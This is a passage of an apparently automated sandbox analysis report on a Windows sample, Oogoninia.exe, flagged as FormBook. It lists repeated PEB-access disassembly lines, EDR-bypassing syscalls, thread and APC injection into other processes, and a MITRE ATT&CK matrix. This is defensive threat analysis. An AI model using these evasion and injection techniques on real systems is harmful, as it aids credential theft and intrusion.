        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CE750 mov eax, dword ptr fs:[00000030h]2_2_325CE750
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32553740 mov eax, dword ptr fs:[00000030h]2_2_32553740
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255174A mov eax, dword ptr fs:[00000030h]2_2_3255174A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32550774 mov eax, dword ptr fs:[00000030h]2_2_32550774
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524779 mov eax, dword ptr fs:[00000030h]2_2_32524779
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524779 mov eax, dword ptr fs:[00000030h]2_2_32524779
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252471B mov eax, dword ptr fs:[00000030h]2_2_3252471B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252471B mov eax, dword ptr fs:[00000030h]2_2_3252471B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF717 mov eax, dword ptr fs:[00000030h]2_2_325DF717
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D700 mov ecx, dword ptr fs:[00000030h]2_2_3252D700
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254270D mov eax, dword ptr fs:[00000030h]2_2_3254270D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254270D mov eax, dword ptr fs:[00000030h]2_2_3254270D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254270D mov eax, dword ptr fs:[00000030h]2_2_3254270D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252170C mov eax, dword ptr fs:[00000030h]2_2_3252170C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252170C mov eax, dword ptr fs:[00000030h]2_2_3252170C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252170C mov eax, dword ptr fs:[00000030h]2_2_3252170C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32523722 mov eax, dword ptr fs:[00000030h]2_2_32523722
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32523722 mov eax, dword ptr fs:[00000030h]2_2_32523722
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32549723 mov eax, dword ptr fs:[00000030h]2_2_32549723
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF7CF mov eax, dword ptr fs:[00000030h]2_2_325DF7CF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E7E0 mov eax, dword ptr fs:[00000030h]2_2_3254E7E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32551796 mov eax, dword ptr fs:[00000030h]2_2_32551796
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32551796 mov eax, dword ptr fs:[00000030h]2_2_32551796
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB781 mov eax, dword ptr fs:[00000030h]2_2_325FB781
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB781 mov eax, dword ptr fs:[00000030h]2_2_325FB781
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F17BC mov eax, dword ptr fs:[00000030h]2_2_325F17BC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325207A7 mov eax, dword ptr fs:[00000030h]2_2_325207A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325ED7A7 mov eax, dword ptr fs:[00000030h]2_2_325ED7A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325ED7A7 mov eax, dword ptr fs:[00000030h]2_2_325ED7A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325ED7A7 mov eax, dword ptr fs:[00000030h]2_2_325ED7A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255D450 mov eax, dword ptr fs:[00000030h]2_2_3255D450
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255D450 mov eax, dword ptr fs:[00000030h]2_2_3255D450
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32528470 mov eax, dword ptr fs:[00000030h]2_2_32528470
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32528470 mov eax, dword ptr fs:[00000030h]2_2_32528470
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF478 mov eax, dword ptr fs:[00000030h]2_2_325DF478
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EA464 mov eax, dword ptr fs:[00000030h]2_2_325EA464
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF409 mov eax, dword ptr fs:[00000030h]2_2_325DF409
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B6400 mov eax, dword ptr fs:[00000030h]2_2_325B6400
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B6400 mov eax, dword ptr fs:[00000030h]2_2_325B6400
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251640D mov eax, dword ptr fs:[00000030h]2_2_3251640D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32557425 mov eax, dword ptr fs:[00000030h]2_2_32557425
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32557425 mov ecx, dword ptr fs:[00000030h]2_2_32557425
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B420 mov eax, dword ptr fs:[00000030h]2_2_3251B420
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A9429 mov eax, dword ptr fs:[00000030h]2_2_325A9429
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325444D1 mov eax, dword ptr fs:[00000030h]2_2_325444D1
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325444D1 mov eax, dword ptr fs:[00000030h]2_2_325444D1
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF4FD mov eax, dword ptr fs:[00000030h]2_2_325DF4FD
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325264F0 mov eax, dword ptr fs:[00000030h]2_2_325264F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A4F0 mov eax, dword ptr fs:[00000030h]2_2_3255A4F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A4F0 mov eax, dword ptr fs:[00000030h]2_2_3255A4F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325494FA mov eax, dword ptr fs:[00000030h]2_2_325494FA
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325554E0 mov eax, dword ptr fs:[00000030h]2_2_325554E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E4EF mov eax, dword ptr fs:[00000030h]2_2_3255E4EF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E4EF mov eax, dword ptr fs:[00000030h]2_2_3255E4EF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255B490 mov eax, dword ptr fs:[00000030h]2_2_3255B490
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255B490 mov eax, dword ptr fs:[00000030h]2_2_3255B490
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AC490 mov eax, dword ptr fs:[00000030h]2_2_325AC490
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32520485 mov ecx, dword ptr fs:[00000030h]2_2_32520485
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255648A mov eax, dword ptr fs:[00000030h]2_2_3255648A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255648A mov eax, dword ptr fs:[00000030h]2_2_3255648A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255648A mov eax, dword ptr fs:[00000030h]2_2_3255648A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E4BC mov eax, dword ptr fs:[00000030h]2_2_3255E4BC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325224A2 mov eax, dword ptr fs:[00000030h]2_2_325224A2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325224A2 mov ecx, dword ptr fs:[00000030h]2_2_325224A2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AD4A0 mov ecx, dword ptr fs:[00000030h]2_2_325AD4A0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AD4A0 mov eax, dword ptr fs:[00000030h]2_2_325AD4A0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AD4A0 mov eax, dword ptr fs:[00000030h]2_2_325AD4A0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325544A8 mov eax, dword ptr fs:[00000030h]2_2_325544A8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB55F mov eax, dword ptr fs:[00000030h]2_2_325FB55F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB55F mov eax, dword ptr fs:[00000030h]2_2_325FB55F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EA553 mov eax, dword ptr fs:[00000030h]2_2_325EA553
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253E547 mov eax, dword ptr fs:[00000030h]2_2_3253E547
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32556540 mov eax, dword ptr fs:[00000030h]2_2_32556540
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32558540 mov eax, dword ptr fs:[00000030h]2_2_32558540
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252254C mov eax, dword ptr fs:[00000030h]2_2_3252254C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253C560 mov eax, dword ptr fs:[00000030h]2_2_3253C560
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]2_2_32541514
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]2_2_32541514
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]2_2_32541514
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]2_2_32541514
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]2_2_32541514
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]2_2_32541514
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AC51D mov eax, dword ptr fs:[00000030h]2_2_325AC51D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CF51B mov eax, dword ptr fs:[00000030h]2_2_325CF51B

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Users\user\Desktop\Oogoninia.exeNtSetContextThread: Indirect: 0x32233749Jump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeNtQueueApcThread: Indirect: 0x3222F552Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFEEA0A2651Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x411B8E8Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x41234E2Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x411B727Jump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeNtSuspendThread: Indirect: 0x32233A69Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x411B959Jump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeNtResumeThread: Indirect: 0x32233D89Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeSection loaded: NULL target: C:\Windows\SysWOW64\grpconv.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\Oogoninia.exeThread register set: target process: 6496Jump to behavior
        Source: C:\Windows\SysWOW64\grpconv.exeThread register set: target process: 6496Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\Oogoninia.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Users\user\Desktop\Oogoninia.exeProcess created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"Jump to behavior
        Source: explorer.exe, 0000000F.00000002.5978085761.0000000001339000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825363719.0000000001339000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman3
        Source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders".lnk%HOMEDRIVE%%HOMEPATH%.pif%USERPROFILE%setup.iniprogman.groupsprogman.onlydesktop.groupsstartup.groupssendto.groupsrecentdocs.groupsSoftware\Microsoft\Windows\CurrentVersionPreConvRenameFilesDeleteFilesRenameFilesSoftware\Microsoft\Windows\CurrentVersion\GrpConv/o-o.grpExceptionReturnHrLogHrFailFast%hs(%u)\%hs!%p: %hs!%p: (caller: %p) %hs(%d) tid(%x) %08X %ws Msg:[%ws] CallContext:[%hs] [%hs(%hs)]
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2826323511.00000000038E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825907492.0000000001B51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825907492.0000000001B51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825907492.0000000001B51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Managerj<1
        Source: Oogoninia.exe, 00000002.00000002.1354974337.000000000225B000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FileDescriptionWindows Progman Group Converterh$
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 0_2_00405DC2 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405DC2

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		12
        Masquerading        		OS Credential Dumping121
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials13
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
